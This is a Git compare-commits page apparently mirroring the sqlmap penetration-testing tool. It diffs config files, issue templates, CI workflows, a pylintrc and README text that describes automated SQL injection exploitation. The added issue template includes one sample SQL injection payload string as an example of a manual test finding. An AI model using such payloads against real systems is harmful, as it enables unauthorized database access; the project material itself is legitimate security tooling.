mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-12-06 20:51:31 +00:00
Compare commits
1 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
8bf566361d |
2
.gitattributes
vendored
2
.gitattributes
vendored
@@ -3,8 +3,6 @@
|
|||||||
*.md5 text eol=lf
|
*.md5 text eol=lf
|
||||||
*.py text eol=lf
|
*.py text eol=lf
|
||||||
*.xml text eol=lf
|
*.xml text eol=lf
|
||||||
LICENSE text eol=lf
|
|
||||||
COMMITMENT text eol=lf
|
|
||||||
|
|
||||||
*_ binary
|
*_ binary
|
||||||
*.dll binary
|
*.dll binary
|
||||||
|
|||||||
1
.github/FUNDING.yml
vendored
1
.github/FUNDING.yml
vendored
@@ -1 +0,0 @@
|
|||||||
github: sqlmapproject
|
|
||||||
26
.github/ISSUE_TEMPLATE.md
vendored
Normal file
26
.github/ISSUE_TEMPLATE.md
vendored
Normal file
@@ -0,0 +1,26 @@
|
|||||||
|
## What's the problem (or question)?
|
||||||
|
<!--- If describing a bug, tell us what happens instead of the expected behavior -->
|
||||||
|
<!--- If suggesting a change/improvement, explain the difference from current behavior -->
|
||||||
|
|
||||||
|
## Do you have an idea for a solution?
|
||||||
|
<!--- Not obligatory, but suggest a fix/reason for the bug, -->
|
||||||
|
<!--- or ideas how to implement the addition or change -->
|
||||||
|
|
||||||
|
## How can we reproduce the issue?
|
||||||
|
<!--- Provide unambiguous set of steps to reproduce this bug. Include command to reproduce, if relevant (you can mask the sensitive data) -->
|
||||||
|
1.
|
||||||
|
2.
|
||||||
|
3.
|
||||||
|
4.
|
||||||
|
|
||||||
|
## What are the running context details?
|
||||||
|
<!--- Include as many relevant details about the running context you experienced the bug/problem in -->
|
||||||
|
* Installation method (e.g. `pip`, `apt-get`, `git clone` or `zip`/`tar.gz`):
|
||||||
|
* Client OS (e.g. `Microsoft Windows 10`)
|
||||||
|
* Program version (`python sqlmap.py --version` or `sqlmap --version` depending on installation):
|
||||||
|
* Target DBMS (e.g. `Microsoft SQL Server`):
|
||||||
|
* Detected WAF/IDS/IPS protection (e.g. `ModSecurity` or `unknown`):
|
||||||
|
* SQLi techniques found by sqlmap (e.g. `error-based` and `boolean-based blind`):
|
||||||
|
* Results of manual target assessment (e.g. found that the payload `query=test' AND 4113 IN ((SELECT 'foobar'))-- qKLV` works):
|
||||||
|
* Relevant console output (if any):
|
||||||
|
* Exception traceback (if any):
|
||||||
37
.github/ISSUE_TEMPLATE/bug_report.md
vendored
37
.github/ISSUE_TEMPLATE/bug_report.md
vendored
@@ -1,37 +0,0 @@
|
|||||||
---
|
|
||||||
name: Bug report
|
|
||||||
about: Create a report to help us improve
|
|
||||||
title: ''
|
|
||||||
labels: bug report
|
|
||||||
assignees: ''
|
|
||||||
|
|
||||||
---
|
|
||||||
|
|
||||||
**Describe the bug**
|
|
||||||
A clear and concise description of what the bug is.
|
|
||||||
|
|
||||||
**To Reproduce**
|
|
||||||
1. Run '...'
|
|
||||||
2. See error
|
|
||||||
|
|
||||||
**Expected behavior**
|
|
||||||
A clear and concise description of what you expected to happen.
|
|
||||||
|
|
||||||
**Screenshots**
|
|
||||||
If applicable, add screenshots to help explain your problem.
|
|
||||||
|
|
||||||
**Running environment:**
|
|
||||||
- sqlmap version [e.g. 1.3.5.93#dev]
|
|
||||||
- Installation method [e.g. git]
|
|
||||||
- Operating system: [e.g. Microsoft Windows 10]
|
|
||||||
- Python version [e.g. 3.5.2]
|
|
||||||
|
|
||||||
**Target details:**
|
|
||||||
- DBMS [e.g. Microsoft SQL Server]
|
|
||||||
- SQLi techniques found by sqlmap [e.g. error-based and boolean-based blind]
|
|
||||||
- WAF/IPS [if any]
|
|
||||||
- Relevant console output [if any]
|
|
||||||
- Exception traceback [if any]
|
|
||||||
|
|
||||||
**Additional context**
|
|
||||||
Add any other context about the problem here.
|
|
||||||
20
.github/ISSUE_TEMPLATE/feature_request.md
vendored
20
.github/ISSUE_TEMPLATE/feature_request.md
vendored
@@ -1,20 +0,0 @@
|
|||||||
---
|
|
||||||
name: Feature request
|
|
||||||
about: Suggest an idea for this project
|
|
||||||
title: ''
|
|
||||||
labels: feature request
|
|
||||||
assignees: ''
|
|
||||||
|
|
||||||
---
|
|
||||||
|
|
||||||
**Is your feature request related to a problem? Please describe.**
|
|
||||||
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
|
|
||||||
|
|
||||||
**Describe the solution you'd like**
|
|
||||||
A clear and concise description of what you want to happen.
|
|
||||||
|
|
||||||
**Describe alternatives you've considered**
|
|
||||||
A clear and concise description of any alternative solutions or features you've considered.
|
|
||||||
|
|
||||||
**Additional context**
|
|
||||||
Add any other context or screenshots about the feature request here.
|
|
||||||
25
.github/workflows/tests.yml
vendored
25
.github/workflows/tests.yml
vendored
@@ -1,25 +0,0 @@
|
|||||||
on:
|
|
||||||
push:
|
|
||||||
branches: [ master ]
|
|
||||||
pull_request:
|
|
||||||
branches: [ master ]
|
|
||||||
|
|
||||||
jobs:
|
|
||||||
build:
|
|
||||||
runs-on: ${{ matrix.os }}
|
|
||||||
strategy:
|
|
||||||
matrix:
|
|
||||||
os: [ubuntu-latest, macos-latest, windows-latest]
|
|
||||||
python-version: [ '2.x', '3.11', 'pypy-2.7', 'pypy-3.7' ]
|
|
||||||
steps:
|
|
||||||
- uses: actions/checkout@v2
|
|
||||||
- name: Set up Python
|
|
||||||
uses: actions/setup-python@v2
|
|
||||||
with:
|
|
||||||
python-version: ${{ matrix.python-version }}
|
|
||||||
- name: Basic import test
|
|
||||||
run: python -c "import sqlmap; import sqlmapapi"
|
|
||||||
- name: Smoke test
|
|
||||||
run: python sqlmap.py --smoke
|
|
||||||
- name: Vuln test
|
|
||||||
run: python sqlmap.py --vuln
|
|
||||||
4
.gitignore
vendored
4
.gitignore
vendored
@@ -1,8 +1,6 @@
|
|||||||
output/
|
|
||||||
__pycache__/
|
|
||||||
*.py[cod]
|
*.py[cod]
|
||||||
|
output/
|
||||||
.sqlmap_history
|
.sqlmap_history
|
||||||
traffic.txt
|
traffic.txt
|
||||||
*~
|
*~
|
||||||
req*.txt
|
|
||||||
.idea/
|
.idea/
|
||||||
546
.pylintrc
546
.pylintrc
@@ -1,546 +0,0 @@
|
|||||||
# Based on Apache 2.0 licensed code from https://github.com/ClusterHQ/flocker
|
|
||||||
|
|
||||||
[MASTER]
|
|
||||||
|
|
||||||
# Specify a configuration file.
|
|
||||||
#rcfile=
|
|
||||||
|
|
||||||
# Python code to execute, usually for sys.path manipulation such as
|
|
||||||
# pygtk.require().
|
|
||||||
init-hook="from pylint.config import find_pylintrc; import os, sys; sys.path.append(os.path.dirname(find_pylintrc()))"
|
|
||||||
|
|
||||||
# Add files or directories to the blacklist. They should be base names, not
|
|
||||||
# paths.
|
|
||||||
ignore=
|
|
||||||
|
|
||||||
# Pickle collected data for later comparisons.
|
|
||||||
persistent=no
|
|
||||||
|
|
||||||
# List of plugins (as comma separated values of python modules names) to load,
|
|
||||||
# usually to register additional checkers.
|
|
||||||
load-plugins=
|
|
||||||
|
|
||||||
# Use multiple processes to speed up Pylint.
|
|
||||||
# DO NOT CHANGE THIS VALUES >1 HIDE RESULTS!!!!!
|
|
||||||
jobs=1
|
|
||||||
|
|
||||||
# Allow loading of arbitrary C extensions. Extensions are imported into the
|
|
||||||
# active Python interpreter and may run arbitrary code.
|
|
||||||
unsafe-load-any-extension=no
|
|
||||||
|
|
||||||
# A comma-separated list of package or module names from where C extensions may
|
|
||||||
# be loaded. Extensions are loading into the active Python interpreter and may
|
|
||||||
# run arbitrary code
|
|
||||||
extension-pkg-whitelist=
|
|
||||||
|
|
||||||
# Allow optimization of some AST trees. This will activate a peephole AST
|
|
||||||
# optimizer, which will apply various small optimizations. For instance, it can
|
|
||||||
# be used to obtain the result of joining multiple strings with the addition
|
|
||||||
# operator. Joining a lot of strings can lead to a maximum recursion error in
|
|
||||||
# Pylint and this flag can prevent that. It has one side effect, the resulting
|
|
||||||
# AST will be different than the one from reality.
|
|
||||||
optimize-ast=no
|
|
||||||
|
|
||||||
|
|
||||||
[MESSAGES CONTROL]
|
|
||||||
|
|
||||||
# Only show warnings with the listed confidence levels. Leave empty to show
|
|
||||||
# all. Valid levels: HIGH, INFERENCE, INFERENCE_FAILURE, UNDEFINED
|
|
||||||
confidence=
|
|
||||||
|
|
||||||
# Enable the message, report, category or checker with the given id(s). You can
|
|
||||||
# either give multiple identifier separated by comma (,) or put this option
|
|
||||||
# multiple time. See also the "--disable" option for examples.
|
|
||||||
disable=all
|
|
||||||
|
|
||||||
enable=import-error,
|
|
||||||
import-self,
|
|
||||||
reimported,
|
|
||||||
wildcard-import,
|
|
||||||
misplaced-future,
|
|
||||||
deprecated-module,
|
|
||||||
unpacking-non-sequence,
|
|
||||||
invalid-all-object,
|
|
||||||
undefined-all-variable,
|
|
||||||
used-before-assignment,
|
|
||||||
cell-var-from-loop,
|
|
||||||
global-variable-undefined,
|
|
||||||
redefine-in-handler,
|
|
||||||
unused-import,
|
|
||||||
unused-wildcard-import,
|
|
||||||
global-variable-not-assigned,
|
|
||||||
undefined-loop-variable,
|
|
||||||
global-at-module-level,
|
|
||||||
bad-open-mode,
|
|
||||||
redundant-unittest-assert,
|
|
||||||
boolean-datetime
|
|
||||||
deprecated-method,
|
|
||||||
anomalous-unicode-escape-in-string,
|
|
||||||
anomalous-backslash-in-string,
|
|
||||||
not-in-loop,
|
|
||||||
continue-in-finally,
|
|
||||||
abstract-class-instantiated,
|
|
||||||
star-needs-assignment-target,
|
|
||||||
duplicate-argument-name,
|
|
||||||
return-in-init,
|
|
||||||
too-many-star-expressions,
|
|
||||||
nonlocal-and-global,
|
|
||||||
return-outside-function,
|
|
||||||
return-arg-in-generator,
|
|
||||||
invalid-star-assignment-target,
|
|
||||||
bad-reversed-sequence,
|
|
||||||
nonexistent-operator,
|
|
||||||
yield-outside-function,
|
|
||||||
init-is-generator,
|
|
||||||
nonlocal-without-binding,
|
|
||||||
lost-exception,
|
|
||||||
assert-on-tuple,
|
|
||||||
dangerous-default-value,
|
|
||||||
duplicate-key,
|
|
||||||
useless-else-on-loop
|
|
||||||
expression-not-assigned,
|
|
||||||
confusing-with-statement,
|
|
||||||
unnecessary-lambda,
|
|
||||||
pointless-statement,
|
|
||||||
pointless-string-statement,
|
|
||||||
unnecessary-pass,
|
|
||||||
unreachable,
|
|
||||||
using-constant-test,
|
|
||||||
bad-super-call,
|
|
||||||
missing-super-argument,
|
|
||||||
slots-on-old-class,
|
|
||||||
super-on-old-class,
|
|
||||||
property-on-old-class,
|
|
||||||
not-an-iterable,
|
|
||||||
not-a-mapping,
|
|
||||||
format-needs-mapping,
|
|
||||||
truncated-format-string,
|
|
||||||
missing-format-string-key,
|
|
||||||
mixed-format-string,
|
|
||||||
too-few-format-args,
|
|
||||||
bad-str-strip-call,
|
|
||||||
too-many-format-args,
|
|
||||||
bad-format-character,
|
|
||||||
format-combined-specification,
|
|
||||||
bad-format-string-key,
|
|
||||||
bad-format-string,
|
|
||||||
missing-format-attribute,
|
|
||||||
missing-format-argument-key,
|
|
||||||
unused-format-string-argument
|
|
||||||
unused-format-string-key,
|
|
||||||
invalid-format-index,
|
|
||||||
bad-indentation,
|
|
||||||
mixed-indentation,
|
|
||||||
unnecessary-semicolon,
|
|
||||||
lowercase-l-suffix,
|
|
||||||
invalid-encoded-data,
|
|
||||||
unpacking-in-except,
|
|
||||||
import-star-module-level,
|
|
||||||
long-suffix,
|
|
||||||
old-octal-literal,
|
|
||||||
old-ne-operator,
|
|
||||||
backtick,
|
|
||||||
old-raise-syntax,
|
|
||||||
metaclass-assignment,
|
|
||||||
next-method-called,
|
|
||||||
dict-iter-method,
|
|
||||||
dict-view-method,
|
|
||||||
indexing-exception,
|
|
||||||
raising-string,
|
|
||||||
using-cmp-argument,
|
|
||||||
cmp-method,
|
|
||||||
coerce-method,
|
|
||||||
delslice-method,
|
|
||||||
getslice-method,
|
|
||||||
hex-method,
|
|
||||||
nonzero-method,
|
|
||||||
t-method,
|
|
||||||
setslice-method,
|
|
||||||
old-division,
|
|
||||||
logging-format-truncated,
|
|
||||||
logging-too-few-args,
|
|
||||||
logging-too-many-args,
|
|
||||||
logging-unsupported-format,
|
|
||||||
logging-format-interpolation,
|
|
||||||
invalid-unary-operand-type,
|
|
||||||
unsupported-binary-operation,
|
|
||||||
not-callable,
|
|
||||||
redundant-keyword-arg,
|
|
||||||
assignment-from-no-return,
|
|
||||||
assignment-from-none,
|
|
||||||
not-context-manager,
|
|
||||||
repeated-keyword,
|
|
||||||
missing-kwoa,
|
|
||||||
no-value-for-parameter,
|
|
||||||
invalid-sequence-index,
|
|
||||||
invalid-slice-index,
|
|
||||||
unexpected-keyword-arg,
|
|
||||||
unsupported-membership-test,
|
|
||||||
unsubscriptable-object,
|
|
||||||
access-member-before-definition,
|
|
||||||
method-hidden,
|
|
||||||
assigning-non-slot,
|
|
||||||
duplicate-bases,
|
|
||||||
inconsistent-mro,
|
|
||||||
inherit-non-class,
|
|
||||||
invalid-slots,
|
|
||||||
invalid-slots-object,
|
|
||||||
no-method-argument,
|
|
||||||
no-self-argument,
|
|
||||||
unexpected-special-method-signature,
|
|
||||||
non-iterator-returned,
|
|
||||||
arguments-differ,
|
|
||||||
signature-differs,
|
|
||||||
bad-staticmethod-argument,
|
|
||||||
non-parent-init-called,
|
|
||||||
bad-except-order,
|
|
||||||
catching-non-exception,
|
|
||||||
bad-exception-context,
|
|
||||||
notimplemented-raised,
|
|
||||||
raising-bad-type,
|
|
||||||
raising-non-exception,
|
|
||||||
misplaced-bare-raise,
|
|
||||||
duplicate-except,
|
|
||||||
nonstandard-exception,
|
|
||||||
binary-op-exception,
|
|
||||||
not-async-context-manager,
|
|
||||||
yield-inside-async-function
|
|
||||||
|
|
||||||
# Needs investigation:
|
|
||||||
# abstract-method (might be indicating a bug? probably not though)
|
|
||||||
# protected-access (requires some refactoring)
|
|
||||||
# attribute-defined-outside-init (requires some refactoring)
|
|
||||||
# super-init-not-called (requires some cleanup)
|
|
||||||
|
|
||||||
# Things we'd like to enable someday:
|
|
||||||
# redefined-builtin (requires a bunch of work to clean up our code first)
|
|
||||||
# redefined-outer-name (requires a bunch of work to clean up our code first)
|
|
||||||
# undefined-variable (re-enable when pylint fixes https://github.com/PyCQA/pylint/issues/760)
|
|
||||||
# no-name-in-module (giving us spurious warnings https://github.com/PyCQA/pylint/issues/73)
|
|
||||||
# unused-argument (need to clean up or code a lot, e.g. prefix unused_?)
|
|
||||||
# function-redefined (@overload causes lots of spurious warnings)
|
|
||||||
# too-many-function-args (@overload causes spurious warnings... I think)
|
|
||||||
# parameter-unpacking (needed for eventual Python 3 compat)
|
|
||||||
# print-statement (needed for eventual Python 3 compat)
|
|
||||||
# filter-builtin-not-iterating (Python 3)
|
|
||||||
# map-builtin-not-iterating (Python 3)
|
|
||||||
# range-builtin-not-iterating (Python 3)
|
|
||||||
# zip-builtin-not-iterating (Python 3)
|
|
||||||
# many others relevant to Python 3
|
|
||||||
# unused-variable (a little work to cleanup, is all)
|
|
||||||
|
|
||||||
# ...
|
|
||||||
[REPORTS]
|
|
||||||
|
|
||||||
# Set the output format. Available formats are text, parseable, colorized, msvs
|
|
||||||
# (visual studio) and html. You can also give a reporter class, eg
|
|
||||||
# mypackage.mymodule.MyReporterClass.
|
|
||||||
output-format=parseable
|
|
||||||
|
|
||||||
# Put messages in a separate file for each module / package specified on the
|
|
||||||
# command line instead of printing them on stdout. Reports (if any) will be
|
|
||||||
# written in a file name "pylint_global.[txt|html]".
|
|
||||||
files-output=no
|
|
||||||
|
|
||||||
# Tells whether to display a full report or only the messages
|
|
||||||
reports=no
|
|
||||||
|
|
||||||
# Python expression which should return a note less than 10 (10 is the highest
|
|
||||||
# note). You have access to the variables errors warning, statement which
|
|
||||||
# respectively contain the number of errors / warnings messages and the total
|
|
||||||
# number of statements analyzed. This is used by the global evaluation report
|
|
||||||
# (RP0004).
|
|
||||||
evaluation=10.0 - ((float(5 * error + warning + refactor + convention) / statement) * 10)
|
|
||||||
|
|
||||||
# Template used to display messages. This is a python new-style format string
|
|
||||||
# used to format the message information. See doc for all details
|
|
||||||
#msg-template=
|
|
||||||
|
|
||||||
|
|
||||||
[LOGGING]
|
|
||||||
|
|
||||||
# Logging modules to check that the string format arguments are in logging
|
|
||||||
# function parameter format
|
|
||||||
logging-modules=logging
|
|
||||||
|
|
||||||
|
|
||||||
[FORMAT]
|
|
||||||
|
|
||||||
# Maximum number of characters on a single line.
|
|
||||||
max-line-length=100
|
|
||||||
|
|
||||||
# Regexp for a line that is allowed to be longer than the limit.
|
|
||||||
ignore-long-lines=^\s*(# )?<?https?://\S+>?$
|
|
||||||
|
|
||||||
# Allow the body of an if to be on the same line as the test if there is no
|
|
||||||
# else.
|
|
||||||
single-line-if-stmt=no
|
|
||||||
|
|
||||||
# List of optional constructs for which whitespace checking is disabled. `dict-
|
|
||||||
# separator` is used to allow tabulation in dicts, etc.: {1 : 1,\n222: 2}.
|
|
||||||
# `trailing-comma` allows a space between comma and closing bracket: (a, ).
|
|
||||||
# `empty-line` allows space-only lines.
|
|
||||||
no-space-check=trailing-comma,dict-separator
|
|
||||||
|
|
||||||
# Maximum number of lines in a module
|
|
||||||
max-module-lines=1000
|
|
||||||
|
|
||||||
# String used as indentation unit. This is usually " " (4 spaces) or "\t" (1
|
|
||||||
# tab).
|
|
||||||
indent-string=' '
|
|
||||||
|
|
||||||
# Number of spaces of indent required inside a hanging or continued line.
|
|
||||||
indent-after-paren=4
|
|
||||||
|
|
||||||
# Expected format of line ending, e.g. empty (any line ending), LF or CRLF.
|
|
||||||
expected-line-ending-format=
|
|
||||||
|
|
||||||
|
|
||||||
[TYPECHECK]
|
|
||||||
|
|
||||||
# Tells whether missing members accessed in mixin class should be ignored. A
|
|
||||||
# mixin class is detected if its name ends with "mixin" (case insensitive).
|
|
||||||
ignore-mixin-members=yes
|
|
||||||
|
|
||||||
# List of module names for which member attributes should not be checked
|
|
||||||
# (useful for modules/projects where namespaces are manipulated during runtime
|
|
||||||
# and thus existing member attributes cannot be deduced by static analysis. It
|
|
||||||
# supports qualified module names, as well as Unix pattern matching.
|
|
||||||
ignored-modules=thirdparty.six.moves
|
|
||||||
|
|
||||||
# List of classes names for which member attributes should not be checked
|
|
||||||
# (useful for classes with attributes dynamically set). This supports can work
|
|
||||||
# with qualified names.
|
|
||||||
ignored-classes=
|
|
||||||
|
|
||||||
# List of members which are set dynamically and missed by pylint inference
|
|
||||||
# system, and so shouldn't trigger E1101 when accessed. Python regular
|
|
||||||
# expressions are accepted.
|
|
||||||
generated-members=
|
|
||||||
|
|
||||||
|
|
||||||
[VARIABLES]
|
|
||||||
|
|
||||||
# Tells whether we should check for unused import in __init__ files.
|
|
||||||
init-import=no
|
|
||||||
|
|
||||||
# A regular expression matching the name of dummy variables (i.e. expectedly
|
|
||||||
# not used).
|
|
||||||
dummy-variables-rgx=_$|dummy
|
|
||||||
|
|
||||||
# List of additional names supposed to be defined in builtins. Remember that
|
|
||||||
# you should avoid to define new builtins when possible.
|
|
||||||
additional-builtins=
|
|
||||||
|
|
||||||
# List of strings which can identify a callback function by name. A callback
|
|
||||||
# name must start or end with one of those strings.
|
|
||||||
callbacks=cb_,_cb
|
|
||||||
|
|
||||||
|
|
||||||
[SIMILARITIES]
|
|
||||||
|
|
||||||
# Minimum lines number of a similarity.
|
|
||||||
min-similarity-lines=4
|
|
||||||
|
|
||||||
# Ignore comments when computing similarities.
|
|
||||||
ignore-comments=yes
|
|
||||||
|
|
||||||
# Ignore docstrings when computing similarities.
|
|
||||||
ignore-docstrings=yes
|
|
||||||
|
|
||||||
# Ignore imports when computing similarities.
|
|
||||||
ignore-imports=no
|
|
||||||
|
|
||||||
|
|
||||||
[SPELLING]
|
|
||||||
|
|
||||||
# Spelling dictionary name. Available dictionaries: none. To make it working
|
|
||||||
# install python-enchant package.
|
|
||||||
spelling-dict=
|
|
||||||
|
|
||||||
# List of comma separated words that should not be checked.
|
|
||||||
spelling-ignore-words=
|
|
||||||
|
|
||||||
# A path to a file that contains private dictionary; one word per line.
|
|
||||||
spelling-private-dict-file=
|
|
||||||
|
|
||||||
# Tells whether to store unknown words to indicated private dictionary in
|
|
||||||
# --spelling-private-dict-file option instead of raising a message.
|
|
||||||
spelling-store-unknown-words=no
|
|
||||||
|
|
||||||
|
|
||||||
[MISCELLANEOUS]
|
|
||||||
|
|
||||||
# List of note tags to take in consideration, separated by a comma.
|
|
||||||
notes=FIXME,XXX,TODO
|
|
||||||
|
|
||||||
|
|
||||||
[BASIC]
|
|
||||||
|
|
||||||
# List of builtins function names that should not be used, separated by a comma
|
|
||||||
bad-functions=map,filter,input
|
|
||||||
|
|
||||||
# Good variable names which should always be accepted, separated by a comma
|
|
||||||
good-names=i,j,k,ex,Run,_
|
|
||||||
|
|
||||||
# Bad variable names which should always be refused, separated by a comma
|
|
||||||
bad-names=foo,bar,baz,toto,tutu,tata
|
|
||||||
|
|
||||||
# Colon-delimited sets of names that determine each other's naming style when
|
|
||||||
# the name regexes allow several styles.
|
|
||||||
name-group=
|
|
||||||
|
|
||||||
# Include a hint for the correct naming format with invalid-name
|
|
||||||
include-naming-hint=no
|
|
||||||
|
|
||||||
# Regular expression matching correct function names
|
|
||||||
function-rgx=[a-z_][a-z0-9_]{2,30}$
|
|
||||||
|
|
||||||
# Naming hint for function names
|
|
||||||
function-name-hint=[a-z_][a-z0-9_]{2,30}$
|
|
||||||
|
|
||||||
# Regular expression matching correct variable names
|
|
||||||
variable-rgx=[a-z_][a-z0-9_]{2,30}$
|
|
||||||
|
|
||||||
# Naming hint for variable names
|
|
||||||
variable-name-hint=[a-z_][a-z0-9_]{2,30}$
|
|
||||||
|
|
||||||
# Regular expression matching correct constant names
|
|
||||||
const-rgx=(([A-Z_][A-Z0-9_]*)|(__.*__))$
|
|
||||||
|
|
||||||
# Naming hint for constant names
|
|
||||||
const-name-hint=(([A-Z_][A-Z0-9_]*)|(__.*__))$
|
|
||||||
|
|
||||||
# Regular expression matching correct attribute names
|
|
||||||
attr-rgx=[a-z_][a-z0-9_]{2,30}$
|
|
||||||
|
|
||||||
# Naming hint for attribute names
|
|
||||||
attr-name-hint=[a-z_][a-z0-9_]{2,30}$
|
|
||||||
|
|
||||||
# Regular expression matching correct argument names
|
|
||||||
argument-rgx=[a-z_][a-z0-9_]{2,30}$
|
|
||||||
|
|
||||||
# Naming hint for argument names
|
|
||||||
argument-name-hint=[a-z_][a-z0-9_]{2,30}$
|
|
||||||
|
|
||||||
# Regular expression matching correct class attribute names
|
|
||||||
class-attribute-rgx=([A-Za-z_][A-Za-z0-9_]{2,30}|(__.*__))$
|
|
||||||
|
|
||||||
# Naming hint for class attribute names
|
|
||||||
class-attribute-name-hint=([A-Za-z_][A-Za-z0-9_]{2,30}|(__.*__))$
|
|
||||||
|
|
||||||
# Regular expression matching correct inline iteration names
|
|
||||||
inlinevar-rgx=[A-Za-z_][A-Za-z0-9_]*$
|
|
||||||
|
|
||||||
# Naming hint for inline iteration names
|
|
||||||
inlinevar-name-hint=[A-Za-z_][A-Za-z0-9_]*$
|
|
||||||
|
|
||||||
# Regular expression matching correct class names
|
|
||||||
class-rgx=[A-Z_][a-zA-Z0-9]+$
|
|
||||||
|
|
||||||
# Naming hint for class names
|
|
||||||
class-name-hint=[A-Z_][a-zA-Z0-9]+$
|
|
||||||
|
|
||||||
# Regular expression matching correct module names
|
|
||||||
module-rgx=(([a-z_][a-z0-9_]*)|([A-Z][a-zA-Z0-9]+))$
|
|
||||||
|
|
||||||
# Naming hint for module names
|
|
||||||
module-name-hint=(([a-z_][a-z0-9_]*)|([A-Z][a-zA-Z0-9]+))$
|
|
||||||
|
|
||||||
# Regular expression matching correct method names
|
|
||||||
method-rgx=[a-z_][a-z0-9_]{2,30}$
|
|
||||||
|
|
||||||
# Naming hint for method names
|
|
||||||
method-name-hint=[a-z_][a-z0-9_]{2,30}$
|
|
||||||
|
|
||||||
# Regular expression which should only match function or class names that do
|
|
||||||
# not require a docstring.
|
|
||||||
no-docstring-rgx=^_
|
|
||||||
|
|
||||||
# Minimum line length for functions/classes that require docstrings, shorter
|
|
||||||
# ones are exempt.
|
|
||||||
docstring-min-length=-1
|
|
||||||
|
|
||||||
|
|
||||||
[ELIF]
|
|
||||||
|
|
||||||
# Maximum number of nested blocks for function / method body
|
|
||||||
max-nested-blocks=5
|
|
||||||
|
|
||||||
|
|
||||||
[IMPORTS]
|
|
||||||
|
|
||||||
# Deprecated modules which should not be used, separated by a comma
|
|
||||||
deprecated-modules=regsub,TERMIOS,Bastion,rexec
|
|
||||||
|
|
||||||
# Create a graph of every (i.e. internal and external) dependencies in the
|
|
||||||
# given file (report RP0402 must not be disabled)
|
|
||||||
import-graph=
|
|
||||||
|
|
||||||
# Create a graph of external dependencies in the given file (report RP0402 must
|
|
||||||
# not be disabled)
|
|
||||||
ext-import-graph=
|
|
||||||
|
|
||||||
# Create a graph of internal dependencies in the given file (report RP0402 must
|
|
||||||
# not be disabled)
|
|
||||||
int-import-graph=
|
|
||||||
|
|
||||||
|
|
||||||
[DESIGN]
|
|
||||||
|
|
||||||
# Maximum number of arguments for function / method
|
|
||||||
max-args=5
|
|
||||||
|
|
||||||
# Argument names that match this expression will be ignored. Default to name
|
|
||||||
# with leading underscore
|
|
||||||
ignored-argument-names=_.*
|
|
||||||
|
|
||||||
# Maximum number of locals for function / method body
|
|
||||||
max-locals=15
|
|
||||||
|
|
||||||
# Maximum number of return / yield for function / method body
|
|
||||||
max-returns=6
|
|
||||||
|
|
||||||
# Maximum number of branch for function / method body
|
|
||||||
max-branches=12
|
|
||||||
|
|
||||||
# Maximum number of statements in function / method body
|
|
||||||
max-statements=50
|
|
||||||
|
|
||||||
# Maximum number of parents for a class (see R0901).
|
|
||||||
max-parents=7
|
|
||||||
|
|
||||||
# Maximum number of attributes for a class (see R0902).
|
|
||||||
max-attributes=7
|
|
||||||
|
|
||||||
# Minimum number of public methods for a class (see R0903).
|
|
||||||
min-public-methods=2
|
|
||||||
|
|
||||||
# Maximum number of public methods for a class (see R0904).
|
|
||||||
max-public-methods=20
|
|
||||||
|
|
||||||
# Maximum number of boolean expressions in a if statement
|
|
||||||
max-bool-expr=5
|
|
||||||
|
|
||||||
|
|
||||||
[CLASSES]
|
|
||||||
|
|
||||||
# List of method names used to declare (i.e. assign) instance attributes.
|
|
||||||
defining-attr-methods=__init__,__new__,setUp
|
|
||||||
|
|
||||||
# List of valid names for the first argument in a class method.
|
|
||||||
valid-classmethod-first-arg=cls
|
|
||||||
|
|
||||||
# List of valid names for the first argument in a metaclass class method.
|
|
||||||
valid-metaclass-classmethod-first-arg=mcs
|
|
||||||
|
|
||||||
# List of member names, which should be excluded from the protected access
|
|
||||||
# warning.
|
|
||||||
exclude-protected=_asdict,_fields,_replace,_source,_make
|
|
||||||
|
|
||||||
|
|
||||||
[EXCEPTIONS]
|
|
||||||
|
|
||||||
# Exceptions that will emit a warning when being caught. Defaults to
|
|
||||||
# "Exception"
|
|
||||||
overgeneral-exceptions=Exception
|
|
||||||
9
.travis.yml
Normal file
9
.travis.yml
Normal file
@@ -0,0 +1,9 @@
|
|||||||
|
language: python
|
||||||
|
sudo: false
|
||||||
|
git:
|
||||||
|
depth: 1
|
||||||
|
python:
|
||||||
|
- "2.6"
|
||||||
|
- "2.7"
|
||||||
|
script:
|
||||||
|
- python -c "import sqlmap; import sqlmapapi"
|
||||||
2
LICENSE
2
LICENSE
@@ -1,7 +1,7 @@
|
|||||||
COPYING -- Describes the terms under which sqlmap is distributed. A copy
|
COPYING -- Describes the terms under which sqlmap is distributed. A copy
|
||||||
of the GNU General Public License (GPL) is appended to this file.
|
of the GNU General Public License (GPL) is appended to this file.
|
||||||
|
|
||||||
sqlmap is (C) 2006-2023 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
|
sqlmap is (C) 2006-2018 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
|
||||||
|
|
||||||
This program is free software; you may redistribute and/or modify it under
|
This program is free software; you may redistribute and/or modify it under
|
||||||
the terms of the GNU General Public License as published by the Free
|
the terms of the GNU General Public License as published by the Free
|
||||||
|
|||||||
26
README.md
26
README.md
@@ -1,15 +1,17 @@
|
|||||||
# sqlmap 
|
# sqlmap
|
||||||
|
|
||||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap) [](https://badge.fury.io/py/sqlmap)
|
||||||
|
|
||||||
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches including database fingerprinting, over data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.
|
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
|
||||||
|
|
||||||
|
**The sqlmap project is sponsored by [Netsparker Web Application Security Scanner](https://www.netsparker.com/?utm_source=github.com&utm_medium=referral&utm_content=sqlmap+repo&utm_campaign=generic+advert).**
|
||||||
|
|
||||||
Screenshots
|
Screenshots
|
||||||
----
|
----
|
||||||
|
|
||||||

|

